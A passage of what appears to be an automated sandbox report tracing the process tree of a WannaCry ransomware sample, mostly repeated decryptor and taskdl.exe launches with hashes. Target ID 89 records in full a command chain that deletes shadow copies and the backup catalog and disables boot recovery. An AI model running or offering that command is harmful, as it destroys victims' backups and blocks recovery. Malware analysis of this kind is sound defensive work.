                                                                                      MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:85
                                                                                      Start time:15:47:59
                                                                                      Start date:23/03/2024
                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
                                                                                      Imagebase:0x7ff62c440000
                                                                                      File size:55'320 bytes
                                                                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:false

                                                                                      Target ID:86
                                                                                      Start time:15:47:59
                                                                                      Start date:23/03/2024
                                                                                      Path:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:@WanaDecryptor@.exe
                                                                                      Imagebase:0x400000
                                                                                      File size:245'760 bytes
                                                                                      MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:87
                                                                                      Start time:15:47:59
                                                                                      Start date:23/03/2024
                                                                                      Path:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:taskdl.exe
                                                                                      Imagebase:0x400000
                                                                                      File size:20'480 bytes
                                                                                      MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:88
                                                                                      Start time:15:47:59
                                                                                      Start date:23/03/2024
                                                                                      Path:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:@WanaDecryptor@.exe
                                                                                      Imagebase:0x400000
                                                                                      File size:245'760 bytes
                                                                                      MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:89
                                                                                      Start time:15:48:00
                                                                                      Start date:23/03/2024
                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Windows\SysWOW64\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
                                                                                      Imagebase:0xf20000
                                                                                      File size:236'544 bytes
                                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:90
                                                                                      Start time:15:48:00
                                                                                      Start date:23/03/2024
                                                                                      Path:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:@WanaDecryptor@.exe
                                                                                      Imagebase:0x400000
                                                                                      File size:245'760 bytes
                                                                                      MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:91
                                                                                      Start time:15:48:00
                                                                                      Start date:23/03/2024
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff6684c0000
                                                                                      File size:862'208 bytes
                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:92
                                                                                      Start time:15:48:00
                                                                                      Start date:23/03/2024
                                                                                      Path:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:taskdl.exe
                                                                                      Imagebase:0x400000
                                                                                      File size:20'480 bytes
                                                                                      MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:93
                                                                                      Start time:15:48:00
                                                                                      Start date:23/03/2024
                                                                                      Path:C:\Windows\SysWOW64\wbem\WMIC.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:wmic shadowcopy delete
                                                                                      Imagebase:0xd90000
                                                                                      File size:427'008 bytes
                                                                                      MD5 hash:E2DE6500DE1148C7F6027AD50AC8B891
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:94
                                                                                      Start time:15:48:00
                                                                                      Start date:23/03/2024
                                                                                      Path:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:@WanaDecryptor@.exe
                                                                                      Imagebase:0x400000
                                                                                      File size:245'760 bytes
                                                                                      MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:95
                                                                                      Start time:15:48:00
                                                                                      Start date:23/03/2024
                                                                                      Path:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:@WanaDecryptor@.exe
                                                                                      Imagebase:0x400000
                                                                                      File size:245'760 bytes
                                                                                      MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:96
                                                                                      Start time:15:48:00
                                                                                      Start date:23/03/2024
                                                                                      Path:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:taskdl.exe
                                                                                      Imagebase:0x400000
                                                                                      File size:20'480 bytes
                                                                                      MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:97
                                                                                      Start time:15:48:00
                                                                                      Start date:23/03/2024
                                                                                      Path:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:@WanaDecryptor@.exe
                                                                                      Imagebase:0x400000
                                                                                      File size:245'760 bytes
                                                                                      MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:98
                                                                                      Start time:15:48:00
                                                                                      Start date:23/03/2024
                                                                                      Path:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:@WanaDecryptor@.exe
                                                                                      Imagebase:0x400000
                                                                                      File size:245'760 bytes
                                                                                      MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:99
                                                                                      Start time:15:48:00
                                                                                      Start date:23/03/2024
                                                                                      Path:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:taskdl.exe
                                                                                      Imagebase:0x400000
                                                                                      File size:20'480 bytes
                                                                                      MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:100
                                                                                      Start time:15:48:00
                                                                                      Start date:23/03/2024
                                                                                      Path:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:@WanaDecryptor@.exe
                                                                                      Imagebase:0x400000
                                                                                      File size:245'760 bytes
                                                                                      MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:101
                                                                                      Start time:15:48:00
                                                                                      Start date:23/03/2024
                                                                                      Path:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:@WanaDecryptor@.exe
                                                                                      Imagebase:0x400000
                                                                                      File size:245'760 bytes
                                                                                      MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:102
                                                                                      Start time:15:48:00
                                                                                      Start date:23/03/2024
                                                                                      Path:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:taskdl.exe
                                                                                      Imagebase:0x400000
                                                                                      File size:20'480 bytes
                                                                                      MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:103
                                                                                      Start time:15:48:00
                                                                                      Start date:23/03/2024
                                                                                      Path:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:@WanaDecryptor@.exe
                                                                                      Imagebase:0x400000
                                                                                      File size:245'760 bytes
                                                                                      MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:104
                                                                                      Start time:15:48:01
                                                                                      Start date:23/03/2024
                                                                                      Path:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:@WanaDecryptor@.exe
                                                                                      Imagebase:0x400000
                                                                                      File size:245'760 bytes
                                                                                      MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:105
                                                                                      Start time:15:48:01
                                                                                      Start date:23/03/2024
                                                                                      Path:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\TaskData\Tor\taskhsvc.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:TaskData\Tor\taskhsvc.exe
                                                                                      Imagebase:0x1e0000
                                                                                      File size:3'098'624 bytes
                                                                                      MD5 hash:FE7EB54691AD6E6AF77F8A9A0B6DE26D
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Antivirus matches:
                                                                                      • Detection: 0%, ReversingLabs
                                                                                      Reputation:low
                                                                                      Has exited:false

                                                                                      Target ID:106
                                                                                      Start time:15:48:01
                                                                                      Start date:23/03/2024
                                                                                      Path:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:taskdl.exe
                                                                                      Imagebase:0x400000
                                                                                      File size:20'480 bytes
                                                                                      MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:107
                                                                                      Start time:15:48:01
                                                                                      Start date:23/03/2024
                                                                                      Path:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:@WanaDecryptor@.exe
                                                                                      Imagebase:0x400000
                                                                                      File size:245'760 bytes
                                                                                      MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:108
                                                                                      Start time:15:48:01
                                                                                      Start date:23/03/2024
                                                                                      Path:C:\Windows\System32\VSSVC.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\vssvc.exe
                                                                                      Imagebase:0x7ff7ed7d0000
                                                                                      File size:1'495'040 bytes
                                                                                      MD5 hash:875046AD4755396636A68F4A9EDB22A4
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:false

                                                                                      Target ID:109
                                                                                      Start time:15:48:01
                                                                                      Start date:23/03/2024
                                                                                      Path:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:@WanaDecryptor@.exe
                                                                                      Imagebase:0x400000
                                                                                      File size:245'760 bytes
                                                                                      MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:110
                                                                                      Start time:15:48:01
                                                                                      Start date:23/03/2024
                                                                                      Path:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:taskdl.exe
                                                                                      Imagebase:0x400000
                                                                                      File size:20'480 bytes
                                                                                      MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:111
                                                                                      Start time:15:48:01
                                                                                      Start date:23/03/2024
                                                                                      Path:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:@WanaDecryptor@.exe
                                                                                      Imagebase:0x400000
                                                                                      File size:245'760 bytes
                                                                                      MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:112
                                                                                      Start time:15:48:01
                                                                                      Start date:23/03/2024
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff6684c0000
                                                                                      File size:862'208 bytes
                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:false

                                                                                      Target ID:113
                                                                                      Start time:15:48:01
                                                                                      Start date:23/03/2024
                                                                                      Path:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:@WanaDecryptor@.exe
                                                                                      Imagebase:0x400000
                                                                                      File size:245'760 bytes
                                                                                      MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:114
                                                                                      Start time:15:48:01
                                                                                      Start date:23/03/2024
                                                                                      Path:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:taskdl.exe
                                                                                      Imagebase:0x400000
                                                                                      File size:20'480 bytes
                                                                                      MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:115
                                                                                      Start time:15:48:01
                                                                                      Start date:23/03/2024
                                                                                      Path:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:@WanaDecryptor@.exe
                                                                                      Imagebase:0x400000
                                                                                      File size:245'760 bytes
                                                                                      MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:116
                                                                                      Start time:15:48:01
                                                                                      Start date:23/03/2024
                                                                                      Path:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:@WanaDecryptor@.exe
                                                                                      Imagebase:0x400000
                                                                                      File size:245'760 bytes
                                                                                      MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:117
                                                                                      Start time:15:48:01
                                                                                      Start date:23/03/2024
                                                                                      Path:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:taskdl.exe
                                                                                      Imagebase:0x400000
                                                                                      File size:20'480 bytes
                                                                                      MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:118
                                                                                      Start time:15:48:02
                                                                                      Start date:23/03/2024
                                                                                      Path:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:@WanaDecryptor@.exe
                                                                                      Imagebase:0x400000
                                                                                      File size:245'760 bytes
                                                                                      MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:119
                                                                                      Start time:15:48:02
                                                                                      Start date:23/03/2024
                                                                                      Path:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:@WanaDecryptor@.exe
                                                                                      Imagebase:0x400000
                                                                                      File size:245'760 bytes
                                                                                      MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:120
                                                                                      Start time:15:48:02
                                                                                      Start date:23/03/2024
                                                                                      Path:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:taskdl.exe
                                                                                      Imagebase:0x400000
                                                                                      File size:20'480 bytes
                                                                                      MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:121
                                                                                      Start time:15:48:02
                                                                                      Start date:23/03/2024
                                                                                      Path:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:@WanaDecryptor@.exe
                                                                                      Imagebase:0x400000
                                                                                      File size:245'760 bytes
                                                                                      MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:122
                                                                                      Start time:15:48:02
                                                                                      Start date:23/03/2024
                                                                                      Path:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:@WanaDecryptor@.exe
                                                                                      Imagebase:0x400000
                                                                                      File size:245'760 bytes
                                                                                      MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:123
                                                                                      Start time:15:48:02
                                                                                      Start date:23/03/2024
                                                                                      Path:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:taskdl.exe
                                                                                      Imagebase:0x400000
                                                                                      File size:20'480 bytes
                                                                                      MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:124
                                                                                      Start time:15:48:02
                                                                                      Start date:23/03/2024
                                                                                      Path:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:@WanaDecryptor@.exe
                                                                                      Imagebase:0x400000
                                                                                      File size:245'760 bytes
                                                                                      MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:125
                                                                                      Start time:15:48:02
                                                                                      Start date:23/03/2024
                                                                                      Path:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:@WanaDecryptor@.exe
                                                                                      Imagebase:0x400000
                                                                                      File size:245'760 bytes
                                                                                      MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:126
                                                                                      Start time:15:48:02
                                                                                      Start date:23/03/2024
                                                                                      Path:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:taskdl.exe
                                                                                      Imagebase:0x400000
                                                                                      File size:20'480 bytes
                                                                                      MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:127
                                                                                      Start time:15:48:02
                                                                                      Start date:23/03/2024
                                                                                      Path:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:@WanaDecryptor@.exe
                                                                                      Imagebase:0x400000
                                                                                      File size:245'760 bytes
                                                                                      MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:128
                                                                                      Start time:15:48:02
                                                                                      Start date:23/03/2024
                                                                                      Path:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:@WanaDecryptor@.exe
                                                                                      Imagebase:0x400000
                                                                                      File size:245'760 bytes
                                                                                      MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:129
                                                                                      Start time:15:48:03
                                                                                      Start date:23/03/2024
                                                                                      Path:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:taskdl.exe
                                                                                      Imagebase:0x400000
                                                                                      File size:20'480 bytes
                                                                                      MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:130
                                                                                      Start time:15:48:03
                                                                                      Start date:23/03/2024
                                                                                      Path:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:@WanaDecryptor@.exe
                                                                                      Imagebase:0x400000
                                                                                      File size:245'760 bytes
                                                                                      MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:131
                                                                                      Start time:15:48:03
                                                                                      Start date:23/03/2024
                                                                                      Path:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:@WanaDecryptor@.exe
                                                                                      Imagebase:0x400000
                                                                                      File size:245'760 bytes
                                                                                      MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:132
                                                                                      Start time:15:48:03
                                                                                      Start date:23/03/2024
                                                                                      Path:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:taskdl.exe
                                                                                      Imagebase:0x400000
                                                                                      File size:20'480 bytes
                                                                                      MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:133
                                                                                      Start time:15:48:03
                                                                                      Start date:23/03/2024
                                                                                      Path:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:@WanaDecryptor@.exe
                                                                                      Imagebase:0x400000
                                                                                      File size:245'760 bytes
                                                                                      MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:134
                                                                                      Start time:15:48:03
                                                                                      Start date:23/03/2024
                                                                                      Path:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:@WanaDecryptor@.exe
                                                                                      Imagebase:0x400000
                                                                                      File size:245'760 bytes
